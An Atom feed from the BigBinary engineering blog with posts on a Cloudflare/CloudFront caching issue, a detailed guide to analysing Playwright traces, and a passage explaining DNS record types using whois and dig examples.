<?xml version="1.0" encoding="utf-8"?>
    <feed xmlns="http://www.w3.org/2005/Atom">
     <title>BigBinary Blog</title>
     <link href="https://www.bigbinary.com/feed.xml" rel="self"/>
     <link href="https://www.bigbinary.com/"/>
     <updated>2026-03-08T07:43:58+00:00</updated>
     <id>https://www.bigbinary.com/</id>
     <entry>
       <title><![CDATA[CDN caching issue involving Cloudfront and Cloudflare]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/cdn-caching-issue-involving-cloudfront-and-cloudflare"/>
      <updated>2026-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cdn-caching-issue-involving-cloudfront-and-cloudflare</id>
      <content type="html"><![CDATA[<p>Recently, some <a href="https://neeto.com">Neeto</a> customers reported experiencing a very long page load time. For some of them, the page didn't even load. We found that the issue was related to CDN caching.</p><p>Neeto uses React.js for the front-end code, and the asset files are hosted at CloudFront. To complicate matters, we use Cloudflare as our DNS resolver. Between Cloudflare and CloudFront, we were not sure what was being cached and at what level. Since this problem was being faced only by our customers, it was a bit difficult to reproduce and debug.</p><p>The whole setup is like this:</p><ul><li>Browsers make requests to https://cdn.neetox.com/assets/xyz.js</li><li>Cloudflare forwards the request to CloudFront</li><li>CloudFront, acting as the caching layer, tries to get the data from the NeetoDeploy server and caches the result</li></ul><p>If the browser is not getting the requested file, then something in this chain didn't work correctly.</p><p>During the investigation, we found that Cloudflare was being a bit mischievous and was doing things it should not be doing. Watch the video to see what I mean.</p><p>The video below is the one I created for the internal Neeto folks. The video is being published <strong>as-is</strong> without any modifications.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/_TCU14fN08A?si=Xy_o6cpSjGvsFFCm" title="CDN caching issue involving Cloudfront and Cloudflare" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe><p>You can see the transcript of the video <a href="https://unni.neetorecord.com/watch/e4c66b38fc57e395fd84">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to analyze Playwright traces]]></title>
       <author><name>Deepanshu Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-analyze-playwright-traces"/>
      <updated>2026-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-analyze-playwright-traces</id>
      <content type="html"><![CDATA[<p>Playwright traces are like flight recorders for your tests - they capture every action, network request, DOM snapshot, and console log during test execution. When a test fails, especially in CI environments, traces become the most powerful debugging tool, providing a complete timeline of what happened and why.</p><p>We learned a lot about Playwright traces while adding Playwright's tracing capabilities to <a href="https://neeto.com/playdash">NeetoPlaydash</a>. We built NeetoPlaydash, the most affordable Playwright dashboard; it collects, monitors, and helps debug Playwright test reports.</p><h2>What are Playwright traces?</h2><p>Playwright traces are compressed archives (<code>.zip</code> files) that contain:</p><ul><li><strong>Complete DOM snapshots</strong> before, during, and after each action.</li><li><strong>Screenshots</strong> of the browser state at every step.</li><li><strong>Network activity</strong>, including all HTTP requests and responses.</li><li><strong>Console logs</strong> from both the browser and your test.</li><li><strong>Action timeline</strong> showing what your test did and when.</li><li><strong>Source code</strong> mapping actions back to your test files.</li><li><strong>Metadata</strong> about the test environment, browser, and configuration.</li></ul><p>Think of traces as a time machine for test execution - we can pause at any moment and see exactly what the browser looked like, what network calls were in flight, and what our code was doing.</p><h2>What is the Trace Viewer?</h2><p>The Trace Viewer is an application used to view and analyze the information collected in trace files. Traces are collected into a zip file during test execution. 
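</p><p>As a concrete starting point, tracing can be turned on from the command line and a recorded trace opened in the local viewer. This is a minimal sketch; the exact path of the generated <code>trace.zip</code> under <code>test-results/</code> depends on your test and project names.</p>

```shell
# Run the test suite with tracing enabled for every test
npx playwright test --trace on

# Open a recorded trace in the local Trace Viewer
# (the path under test-results/ is an example and will differ per test)
npx playwright show-trace test-results/example-test/trace.zip
```

<p>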
The Trace Viewer makes sense of and displays this information in an interactive interface.</p><p>We can view traces in two ways:</p><ul><li><strong>Locally</strong> - Using the Trace Viewer app that ships with Playwright (via the Playwright CLI).</li><li><strong>Online</strong> - By visiting <a href="https://trace.playwright.dev/">trace.playwright.dev</a> and uploading our trace file.</li></ul><p>Both methods provide the same powerful debugging experience, allowing us to navigate through our test execution, inspect DOM snapshots, analyze network requests, and debug failures.</p><h2>Understanding the Trace Viewer interface</h2><p>One can download a <a href="/blog_images/how_to_analyze_playwright_traces/sample-trace.zip">sample trace file</a> to follow along with this blog. We can also view it directly in the <a href="https://trace.playwright.dev/">Trace Viewer</a>.</p><p>The Trace Viewer interface is divided into several key areas that work together to help us debug our tests.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/trace-viewer-overview.png" alt="Trace Viewer Overview"></p><h3>1. Action Timeline (Top)</h3><p>A visual filmstrip showing screenshots of our test execution over time. We can:</p><ul><li><strong>Hover</strong> to see magnified previews.</li><li><strong>Click</strong> to jump to specific moments.</li><li><strong>Double-click</strong> an action to focus on its time range.</li><li><strong>Drag</strong> to select a range of actions for filtering.</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/action-timeline.png" alt="Action Timeline"></p><h3>2. The Actions Tab: Our test execution timeline</h3><p>The Actions tab is typically our starting point. 
Each action shows:</p><ul><li><strong>Duration anomalies</strong> - Actions taking unusually long suggest performance issues or waiting problems.</li><li><strong>Locator information</strong> - Verify that we are targeting the correct elements.</li><li><strong>Action sequence</strong> - Ensure actions execute in the expected order.</li><li><strong>Red/failed actions</strong> - These are our primary debugging targets.</li></ul><p>Hover over each action to see the DOM highlight change in real time. This helps verify that Playwright is interacting with the correct element.</p><p><strong>Example:</strong></p><pre><code>page.goto(&quot;https://app.neetocal.com&quot;) - 1.2s
page.getByTestId(&quot;login-button&quot;).click() - 0.3s
page.getByTestId(&quot;email-input&quot;).fill(&quot;test@example.com&quot;) - 30s TIMEOUT</code></pre><p>Here, the fill action timed out. Select the action and use the <strong>Before</strong> and <strong>After</strong> tabs above the main snapshot viewing area to see why the element wasn't available.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/actions-tab.png" alt="Actions Tab"></p><h3>3. Metadata Tab: Environment context</h3><p>The <strong>Metadata</strong> section provides high-level contextual information about the test execution environment and run characteristics. This information helps in understanding <em>when</em>, <em>how</em>, and <em>under what conditions</em> the trace was recorded.</p><ul><li><strong>Time:</strong> Displays the start time, end time, and total duration of the test.</li><li><strong>Browser:</strong> Displays the browser (e.g., Chromium, Firefox, WebKit), platform, and user agent used during the test run.</li><li><strong>Config:</strong> Shows the Playwright configuration applied for the run. Includes relevant settings such as test options, retries, timeouts, and project-level overrides.</li><li><strong>Viewport:</strong> Specifies the viewport dimensions used during execution. 
Helps diagnose layout, responsiveness, and visual issues tied to screen size.</li><li><strong>Counts (Metrics):</strong> Summarizes key execution metrics captured in the trace, such as:<ul><li><strong>Pages</strong> - Pages captured during the trace.</li><li><strong>Actions</strong> - Actions performed during the test.</li><li><strong>Events</strong> - Runtime events logged during execution.</li></ul></li></ul><p>This is particularly useful when:</p><ul><li>Tests pass locally but fail in CI.</li><li>Tests behave differently across browsers.</li><li>Issues are viewport-specific (responsive design bugs).</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/metadata-tab.png" alt="Metadata Tab"></p><h3>4. Main Content Area (Center)</h3><p>The <strong>Main Content Area</strong> is the primary visual workspace of the Trace Viewer. It displays detailed, interactive views of the application state for the selected action, enabling precise inspection and debugging.</p><h4>Pick Locator</h4><p>Allows us to interactively select elements directly from the snapshot. It automatically generates the corresponding Playwright locator, helping validate selectors and improve test reliability.</p><h4>Snapshots: Time-Travel Debugging</h4><p>Snapshots capture the complete DOM state at three critical moments:</p><ul><li><strong>Action</strong> - The exact moment of interaction (showing the precise click coordinates or input position with a red dot).</li><li><strong>Before</strong> - State when the action was called.</li><li><strong>After</strong> - State after the action is completed.</li></ul><p><strong>Using snapshots effectively:</strong></p><ul><li><strong>Compare Before/After</strong> to see what changed.</li><li><strong>Inspect element visibility</strong> - Was the element actually visible and interactable?</li><li><strong>Check for overlays</strong> - Are modals, loading spinners, or other elements blocking interaction?</li><li><strong>Verify element state</strong> - Is the 
button disabled? Is the input read-only?</li></ul><p><strong>Debugging technique:</strong> When a click fails, examine the highlighted click position in the Action snapshot. If it's not where we expect, we may have:</p><ul><li>Multiple elements matching our locator (strict mode violation).</li><li>An element that moved during Playwright's auto-wait.</li><li>An element obscured by another element (z-index issues).</li></ul><h4>Open Snapshot in a New Tab</h4><p>Opens the current DOM snapshot in a separate browser tab. Useful for deep inspection, side-by-side comparison, or analyzing complex layouts without losing trace context.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/main-content-area.png" alt="Main Content Area"></p><h3>5. Tab Bar (Bottom/Right)</h3><h4>Locator Tab</h4><p>This is useful for getting the locator of any element. Click the Locator button and hover over any component in the snapshot; the locator for that element will appear in the code space below the button. 
The reverse is also possible - typing a locator in the code space will highlight the corresponding element in the main content area, making it easy to verify locators and test selectors.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/locator-tab.png" alt="Locator Tab"></p><h4>Call Tab: Action details</h4><p>The Call tab provides granular information about each action:</p><ul><li><strong>Function signature</strong> - The exact Playwright method called.</li><li><strong>Parameters</strong> - Arguments passed to the function.</li><li><strong>Locator string</strong> - How Playwright found the element.</li><li><strong>Strict mode</strong> - Whether strict mode was enforced.</li><li><strong>Timeout</strong> - Maximum wait time configured.</li><li><strong>Return value</strong> - The resolved value of the Playwright function call.</li></ul><p><strong>Example:</strong></p><pre><code class="language-javascript">await expect(page.getByTestId(&quot;publish-btn&quot;)).toBeDisabled({ timeout: 10_000 });</code></pre><p>The corresponding details would show the function signature, parameters, and execution result.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/call-tab.png" alt="Call Tab"></p><h4>Log Tab: Playwright's internal actions</h4><p>The Log tab reveals what Playwright does behind the scenes. It contains Playwright-generated internal logs for the selected action and provides insight into retries, waiting behavior, timeouts, and internal decision-making.</p><pre><code>waiting for getByTestId('submit-button').
locator resolved to &lt;button&gt;Submit&lt;/button&gt;.
scrolling element into view if needed.
waiting for element to be visible.
waiting for element to be enabled.
waiting for element to be stable.
waiting for element to receive pointer events.
performing click action.
click action completed.</code></pre><p><strong>Why this matters:</strong> Understanding Playwright's auto-wait mechanism helps us in the following areas:</p><ul><li>Identify which wait condition failed.</li><li>Optimize our locators.</li><li>Add appropriate waits when auto-wait isn't sufficient.</li><li>Debug flaky tests caused by race conditions.</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/log-tab.png" alt="Log Tab"></p><h4>Errors Tab: Failure analysis</h4><p>When tests fail, the Errors tab is our first stop. It shows:</p><ul><li>Error messages with stack traces.</li><li>Playwright's failure reason.</li><li>Timeout information.</li><li>Expected vs. actual states (for assertions).</li></ul><p><strong>The timeline also highlights errors</strong> with a red vertical line, making it easy to see when things went wrong. The tab lists errors and exceptions associated with the action or test step, including failure messages, stack traces, and error types, to quickly identify what went wrong.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/errors-tab.png" alt="Errors Tab"></p><h4>Console Tab: Browser and test logs</h4><p>The Console tab shows all console output, including:</p><ul><li><code>console.log</code>, <code>console.error</code>, <code>console.warn</code> from our application.</li><li>Browser warnings and errors.</li><li>Test framework logs.</li><li>Playwright's internal logs.</li></ul><p><strong>Visual indicators:</strong></p><ul><li>Different icons distinguish between browser console logs and test logs.</li><li>Error messages are highlighted in red.</li><li>Warnings appear in yellow.</li></ul><p><strong>Filtering console logs:</strong> Double-click an action in the sidebar to filter console logs to only that action's timeframe. 
This is crucial when dealing with verbose applications.</p><p><strong>Common patterns to look for:</strong></p><pre><code class="language-javascript">// React errors
Warning: Can't perform a React state update on an unmounted component

// Network errors
Failed to load resource: the server responded with a status of 404

// Application errors
Uncaught TypeError: Cannot read property 'id' of undefined

// CORS issues
Access to fetch at 'https://api.example.com' has been blocked by CORS policy</code></pre><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/console-tab.png" alt="Console Tab"></p><h4>The Network Tab: API and resource investigation</h4><p>The Network tab is invaluable for debugging issues related to:</p><ul><li>API failures.</li><li>Slow page loads.</li><li>Missing resources.</li><li>Authentication problems.</li></ul><p><strong>Key columns:</strong></p><ul><li><strong>Method</strong> (GET, POST, PUT, DELETE, etc.)</li><li><strong>URL</strong> (full request path)</li><li><strong>Status</strong> (200, 404, 500, etc.)</li><li><strong>Content Type</strong> (application/json, text/html, etc.)</li><li><strong>Duration</strong> (request time)</li><li><strong>Size</strong> (response size)</li></ul><p><strong>Filtering network requests:</strong></p><ul><li>Use the timeline to select a specific action range.</li><li>The Network tab automatically filters to show only requests during that period.</li></ul><p><strong>What to investigate:</strong></p><pre><code>GET /api/auth/session - 200 - 45ms - application/json
POST /api/bookings/create - 500 - 2.1s - application/json
GET /api/user/profile - 200 - 89ms - application/json</code></pre><p>The 500 error on the booking creation is our culprit. 
Click on it to see:</p><ul><li><strong>Request headers</strong> - Is authentication included (CSRF token)?</li><li><strong>Request body</strong> - Is the payload correct?</li><li><strong>Response headers</strong> - Any CORS issues?</li><li><strong>Response body</strong> - What error message did the server return?</li></ul><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/network-tab.png" alt="Network Tab"></p><h4>Source Tab: Connecting traces to code</h4><p>The Source tab displays our test code and highlights the exact line corresponding to the selected action. This is crucial for:</p><ul><li>Understanding what your test was trying to do.</li><li>Verifying locators and test logic.</li><li>Jumping between test code and execution results.</li></ul><p><strong>Workflow:</strong></p><ol><li>Click an action in the sidebar.</li><li>The Source tab automatically shows the relevant code line.</li><li>Review the locator, expected behavior, and assertions.</li><li>Cross-reference with the DOM snapshot to verify assumptions.</li></ol><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/source-tab.png" alt="Source Tab"></p><h4>Attachments Tab: Visual regression and screenshots</h4><p>For tests using visual comparisons or custom attachments, this tab shows:</p><ul><li><strong>Screenshot comparisons</strong> (expected, actual, diff).</li><li><strong>Image slider</strong> to overlay images and spot differences.</li><li><strong>Custom attachments</strong> added via <code>test.attach()</code>.</li><li><strong>Screenshots</strong> &amp; <strong>video recordings</strong> (if configured).</li></ul><p><strong>Visual regression workflow:</strong></p><ol><li>Navigate to the Attachments tab.</li><li>View the diff image, highlighting differences in red.</li><li>Use the slider to compare expected vs. 
actual.</li><li>Determine if changes are legitimate or bugs.</li></ol><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/attachments-tab.png" alt="Attachments Tab"></p><h2>Advanced debugging techniques</h2><h3>1. Time-Range filtering for complex tests</h3><p>For long-running tests with many actions:</p><ol><li>Click a starting point on the timeline.</li><li>Drag to an ending point.</li><li>All tabs (Actions, Network, Console) filter to this range.</li><li>Focus your investigation on the relevant portion.</li></ol><h3>2. Network request correlation</h3><p>When debugging API-dependent tests:</p><ol><li>Find the failing action.</li><li>Check the Network tab for API calls during that action.</li><li>Verify request/response timing.</li><li>Ensure data contracts match expectations.</li></ol><p><strong>Example investigation:</strong></p><pre><code>Test: User creates a booking.
Action: page.click(&quot;button[type=submit]&quot;).
Network: POST /api/bookings/create - 400 Bad Request.
Response: {&quot;error&quot;: &quot;Invalid time slot&quot;}.
Conclusion: Form validation passed, but the API rejected the data.
Next step: Check whether the time slot selection logic has a bug.</code></pre><h3>3. Console error causation</h3><p>Browser console errors often precede test failures:</p><ol><li>Review the Console tab chronologically.</li><li>Look for errors before the failing action.</li><li>JavaScript errors may prevent event handlers from working.</li><li>Network errors may leave the UI in an invalid state.</li></ol><h3>4. Locator strategy validation</h3><p>When the element isn't found:</p><ol><li>Check the Before snapshot - is the element present?</li><li>Review the Call tab - is the locator correct?</li><li>Use browser DevTools on the snapshot to test alternative locators.</li></ol><h3>5. Race condition detection</h3><p>Flaky tests often have race conditions:</p><ol><li>Compare traces from passed vs. 
failed runs.</li><li>Look for timing differences in the Network tab.</li><li>Check if elements appear/disappear between snapshots.</li></ol><h2>Common debugging scenarios</h2><h3>Scenario 1: &quot;Element Not Found&quot; errors</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Navigate to the failing click/fill action.</li><li>Examine the Before snapshot - is the element in the DOM?</li><li>Check the Console for JavaScript errors that might prevent rendering.</li><li>Review the Network tab - did the page load completely?</li><li>Verify that the locator in the Call tab matches the element you expect.</li></ol><p><strong>Possible causes:</strong></p><ul><li>Element hasn't rendered yet (needs <code>waitForSelector</code>).</li><li>Wrong locator (typo, dynamic attributes).</li><li>Element is in a different frame/iframe.</li><li>Previous action failed, leaving the UI in an unexpected state.</li></ul><h3>Scenario 2: &quot;Timeout Waiting for Element&quot; errors</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Check element visibility in the Before snapshot.</li><li>Look at the element's CSS properties (display, opacity, visibility).</li><li>Check for z-index issues or overlapping elements.</li><li>Review the Network tab for slow API responses blocking the UI.</li><li>Check the Console for loading state indicators.</li></ol><p><strong>Possible causes:</strong></p><ul><li>CSS hides the element.</li><li>Loading spinner still active.</li><li>API call hasn't completed.</li><li>Modal or overlay blocking interaction.</li><li>Element removed and re-added (Playwright lost its reference).</li></ul><h3>Scenario 3: API failures causing test failures</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Filter the Network tab to the action's timeframe.</li><li>Find failed API requests (4xx, 5xx status codes).</li><li>Inspect the request payload - is the test data valid?</li><li>Check the response body for error details.</li><li>Verify authentication headers are 
present.</li></ol><p><strong>Possible causes:</strong></p><ul><li>Test data doesn't match API validation rules.</li><li>Authentication token expired (X-CSRF token).</li><li>Database state inconsistent (previous test didn't clean up).</li><li>API endpoint changed (version mismatch).</li></ul><h3>Scenario 4: Tests pass locally but fail in CI</h3><p><strong>Trace analysis steps:</strong></p><p>Run the test locally as well and open the traces for both runs (local and CI):</p><ol><li>Compare the Metadata tab - check browser, viewport, and timezone differences.</li><li>Look for timing differences in action durations.</li><li>Check for environment-specific console errors.</li><li>Compare the Network tab - are API endpoints different?</li></ol><p><strong>Possible causes:</strong></p><ul><li>Timezone-dependent test data.</li><li>Slower CI environment (needs longer timeouts).</li><li>Different environment variables.</li><li>Other tests affecting this test (a very rare case).</li></ul><h3>Scenario 5: Flaky tests (intermittent failures)</h3><p><strong>Trace analysis steps:</strong></p><ol><li>Compare traces from multiple runs (passed and failed).</li><li>Look for timing variations in network requests.</li><li>Check for race conditions between actions.</li><li>Review auto-wait logs for differences in element stability.</li><li>Look for animations or transitions affecting element states.</li></ol><p><strong>Possible causes:</strong></p><ul><li>Race conditions between UI updates and test actions.</li><li>Async operations without proper waits.</li><li>Animations not completing before interaction.</li><li>Network request order is non-deterministic.</li><li>Shared test state between test runs.</li></ul><h2>Best practices for trace analysis</h2><h4>1. Start with the error</h4><p>Always begin at the point of failure. The Errors tab and red timeline markers guide you directly there.</p><h4>2. 
Trace backwards</h4><p>After identifying the error, trace back through the actions to determine its root cause, which may be linked to an event that occurred several steps earlier.</p><h4>3. Compare known-good traces</h4><p>If you have a passing trace, compare it side by side with the failing trace to spot differences quickly.</p><h4>4. Use timeline filtering liberally</h4><p>Don't drown in information. Filter the timeline to focus on relevant actions and reduce noise.</p><h4>5. Correlate across tabs</h4><p>True debugging power comes from correlating information across tabs:</p><ul><li>Action timing + network requests + console logs = complete picture.</li></ul><h4>6. Document your findings</h4><p>When you identify the root cause, document it:</p><ul><li>Add comments to your test code.</li><li>Update test data or fixtures.</li><li>Fix race conditions with proper waits.</li><li>Report application bugs with trace evidence.</li></ul><h4>7. Configure appropriate trace collection</h4><p>In your <code>playwright.config.ts</code>:</p><pre><code class="language-typescript">import { defineConfig } from &quot;@playwright/test&quot;;

export default defineConfig({
  use: {
    // Capture trace only on first retry (recommended for CI)
    trace: &quot;on-first-retry&quot;,

    // Or retain traces only for failures
    // trace: 'retain-on-failure',

    // For local debugging, enable traces for all tests
    // trace: 'on',
  },

  // Enable retries to capture traces on failures
  retries: process.env.CI ? 2 : 0,
});</code></pre><h2>Trace Viewer keyboard shortcuts</h2><p>Speed up your analysis with these shortcuts:</p><ul><li><strong>Arrow keys</strong> - Navigate between actions.</li><li><strong>Esc</strong> - Clear selection/filtering.</li><li><strong>Ctrl/Cmd + F</strong> - Search within the trace.</li></ul><h2>Accessing traces in NeetoPlaydash</h2><p><a href="https://neeto.com/neetoplaydash">NeetoPlaydash</a> is a test management platform that integrates seamlessly with Playwright's tracing capabilities. 
When a test runs on CI, Playwright automatically generates trace files. To access them:</p><ol><li><strong>Navigate to NeetoPlaydash</strong> - Open your projects dashboard.</li><li><strong>Select a Test Run</strong> - Choose the test execution you want to investigate for a particular project.</li><li><strong>Open the Test Details Pane</strong> - View the details of a specific test.</li><li><strong>Click &quot;Open Trace&quot;</strong> - This button launches the Trace Viewer with your test's trace file.</li></ol><p>The trace opens in your browser at <code>trace.playwright.dev</code> or locally via the Playwright CLI, providing a complete, interactive debugging experience without requiring manual file downloads.</p><p><img src="/blog_images/2026/how-to-analyze-playwright-traces/access-trace-neetoplaydash.png" alt="Access trace in NeetoPlaydash"></p><h2>Further resources</h2><ul><li><a href="https://playwright.dev/docs/trace-viewer">Playwright Trace Viewer Documentation</a></li><li><a href="https://playwright.dev/docs/best-practices">Playwright Best Practices</a></li><li><a href="https://playwright.dev/docs/debug">Debugging Playwright Tests</a></li><li><a href="https://trace.playwright.dev/">Online Trace Viewer</a></li><li><a href="https://courses.bigbinaryacademy.com/learn-qa-automation-using-playwright/">Learn QA Automation using Playwright Course</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[DNS basics and how DNS works in Neeto]]></title>
       <author><name>S Varun</name></author>
      <link href="https://www.bigbinary.com/blog/dns-basics-and-how-dns-works-in-neeto"/>
      <updated>2026-01-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/dns-basics-and-how-dns-works-in-neeto</id>
      <content type="html"><![CDATA[<p>This blog started with an explanation of how DNS works in <a href="https://neeto.com">Neeto</a>. However, we ended up covering a lot of ground about how DNS actually works.</p><h1>The Basics of DNS Records</h1><p>The Domain Name System (DNS) is a hierarchical and decentralized naming system for computers and servers connected to the Internet. It essentially translates human-readable domain names into machine-readable IP addresses.</p><h2>What is a Domain Name?</h2><p>A Domain Name is a unique, human-friendly label used to identify one or more IP addresses. It's what people type into a web browser to visit a website. For example, <code>google.com</code> and <code>wikipedia.org</code> are domain names.</p><h2>Purchasing a New Domain Name</h2><p>You don't buy a domain name outright. Technically, you register the right to use it for a specified period (typically 1 to 10 years) from a Domain Name Registrar. These are called &quot;registrars&quot; because you are registering the right to use the domain name.</p><p>Popular Domain Name Registrars are GoDaddy, Namecheap, Cloudflare, and Porkbun.</p><h2>DNS Records: Types and Uses</h2><p>DNS Records provide information about a domain, primarily mapping hostnames to IP addresses. There are many different types of DNS records. We will look at the important ones.</p><h3>A Record</h3><p>&quot;A record&quot; stands for &quot;Address record&quot;. It maps a domain name (like google.com) to an IPv4 address (like 93.184.216.34).</p><h3>AAAA Record</h3><p>This does exactly the same thing as an A record, but for IPv6 addresses. 
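</p><p>These record types can be explored with the <code>dig</code> utility (a sketch; the addresses returned will vary by resolver and over time):</p>

```shell
# Look up the A (IPv4) record for a domain
dig +short A google.com

# Look up the AAAA (IPv6) record for the same domain
dig +short AAAA google.com
```

<p>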
The four As signify the much bigger IPv6 address range.</p><h3>CNAME Record</h3><p>&quot;CNAME record&quot; stands for &quot;Canonical Name Record&quot;.</p><p>Instead of pointing directly to an IP address like an A record does, a CNAME points one hostname to another hostname.</p><p>An example of a CNAME record could be: <code>blog.bigbinary.com</code> -&gt; <code>bigbinary.github.io</code>.</p><p>What the CNAME is saying here is that if you are visiting <code>blog.bigbinary.com</code>, then this record doesn't have the IP address information. If you want an IP address, then ask for that info from <code>bigbinary.github.io</code>. Remember that IP addresses are provided by A and AAAA records.</p><p>Another way of looking at it is that an A record provides the IP address, while a CNAME provides the address of the next machine that we can ask for the IP address.</p><p>Please note that it is quite possible that the next machine might have another CNAME, and that in turn might have another CNAME.</p><p>The main point is that a CNAME keeps the record of the next machine to ask. In the end, some machine has to have an A or AAAA record so that a domain is mapped to an IP address.</p><h3>MX Record</h3><p>&quot;MX Record&quot; stands for &quot;Mail Exchanger Record&quot;.</p><p>It specifies the mail servers responsible for accepting email messages on behalf of a domain.</p><h3>TXT Record</h3><p>A TXT record (Text record) lets a domain owner store arbitrary text data in DNS. Other services then look up that text to verify ownership, check email policies, etc. Think of it like a sticky note that the domain owner can add for others to read.</p><p>Here are some use cases of the TXT record:</p><h4>Adding SPF records</h4><pre><code class="language-sh">bigbinary.com. IN TXT &quot;v=spf1 ip4:198.51.100.10 include:_spf.google.com -all&quot;</code></pre><h4>Domain verification</h4><p>Here is an example of a site-verification record used by Google:</p><pre><code class="language-sh">bigbinary.com. 
IN TXT &quot;google-site-verification=asduiashd9812h98asdh&quot;</code></pre><h4>Adding DMARC records</h4><pre><code class="language-sh">_dmarc.bigbinary.com. IN TXT &quot;v=DMARC1; p=reject; rua=mailto:dmarc@example.com&quot;</code></pre><h3>NS Record</h3><p>NS stands for &quot;Name servers&quot;.</p><p>Let's say that a user types in the URL <code>https://blog.neeto.com</code>. The job of the DNS system is to ultimately find an IP address to which the request can be sent. Now, let's think about how to go about searching for the IP address.</p><p>We need to ask some machine for more information about <code>blog.neeto.com</code>. That information could be a CNAME record, an A record, or a AAAA record. But the problem is: whom should we ask? Where do we start the journey?</p><p>That's where the NS record comes into the picture. Remember, each domain is registered with a registrar, so that's where the DNS system starts the journey. First, DNS will ask the registrar of the domain, &quot;Hey, can you give me the name servers to whom I can start asking questions?&quot;</p><p>Let's take a practical case and execute the following command in the terminal:</p><pre><code class="language-sh">whois neeto.com</code></pre><p>We'll get a lot of data, but we want to concentrate on the following six lines:</p><pre><code class="language-sh">Domain Name: NEETO.COM
Registrar WHOIS Server: whois.cloudflare.com
Registrar: Cloudflare, Inc.
Registrar URL: https://www.cloudflare.com
Name Server: BARBARA.NS.CLOUDFLARE.COM
Name Server: YEW.NS.CLOUDFLARE.COM</code></pre><p>We can see that the Registrar for neeto.com is &quot;Cloudflare&quot;. We also see that there are two name servers, which are also on <code>cloudflare.com</code>. The people who designed name servers dictated that there should always be at least two name servers. 
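</p><p>The name servers reported by <code>whois</code> can also be confirmed by querying DNS directly (output order may vary between runs):</p>

```shell
# Ask DNS for the NS records of the domain
dig +short NS neeto.com
```

<p>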
In this way, if one of them goes down for any reason, the overall system keeps working.</p><p>Taking our example of <code>blog.neeto.com</code>, if we need a CNAME record, an A record, or an AAAA record, then we need to start asking those questions to these two name servers.</p><p>Now let's do the same experiment with another domain. This time, we will choose <code>https://bigbinary.com</code>.</p><pre><code class="language-sh">whois bigbinary.com</code></pre><p>This time, we will get the following lines.</p><pre><code class="language-sh">Domain Name: BIGBINARY.COM
Registrar: GoDaddy.com, LLC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Name Server: BARBARA.NS.CLOUDFLARE.COM
Name Server: YEW.NS.CLOUDFLARE.COM</code></pre><p>Notice that this time the registrar is <code>GoDaddy</code>, but the name servers are at <code>cloudflare.com</code>. This is because <code>bigbinary.com</code> is registered with <code>GoDaddy</code>. When a domain is purchased from a registrar, the name servers default to the registrar's own name servers. So after the initial registration, <code>bigbinary.com</code> had the GoDaddy name servers, but chose not to use them. With the help of NS records, BigBinary told GoDaddy that it doesn't want to use GoDaddy's name servers and wants to use the Cloudflare name servers instead. This means that all future DNS records for <code>bigbinary.com</code> can be maintained in Cloudflare.</p><p>This goes to show that one is not restricted to the registrar's name servers.</p><p>Name servers, just like CNAME records, never point to an IP address. 
They always point to another hostname.</p><h2>Different parts of a URL</h2><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/different-parts-of-domain2.png" alt="Different parts of a URL"></p><h3>Protocol</h3><p>The protocol is the initial part that specifies the set of methods used for transferring data between a web browser and a server. It essentially defines how the browser and the server communicate. The most common protocols are <code>http</code> (Hypertext Transfer Protocol) and its secure version <code>https</code> (Hypertext Transfer Protocol Secure).</p><h3>Top-Level Domain (TLD)</h3><p>A Top-Level Domain (TLD) is the very last part of a domain name, located after the final dot.</p><p>For example, in google.com the <code>.com</code> is the Top-Level Domain (TLD). Common TLDs are <code>.com</code>, <code>.org</code>, <code>.net</code>, etc.</p><h3>Subdomain</h3><p>A subdomain is a label that comes before the main part of a domain name.</p><p>For example, in the address blog.bigbinary.com the <code>blog</code> is the subdomain.</p><p>We can have <code>a.b.c.d.e.f.blog.bigbinary.com</code>. Technically, up to 127 levels of subdomains are allowed.</p><h3>Root domain</h3><p>A root-level domain is the base name of a website. For example, in <code>www.google.com</code> the <code>.com</code> part is the TLD and the <code>google.com</code> part is the root-level domain.</p><h3>Strange case of the www subdomain</h3><p>Let's say that we registered a brand new domain called <code>spinjudo.com</code> with Cloudflare. We have our marketing site up and running on Vercel, and we want to host our blog on WordPress. 
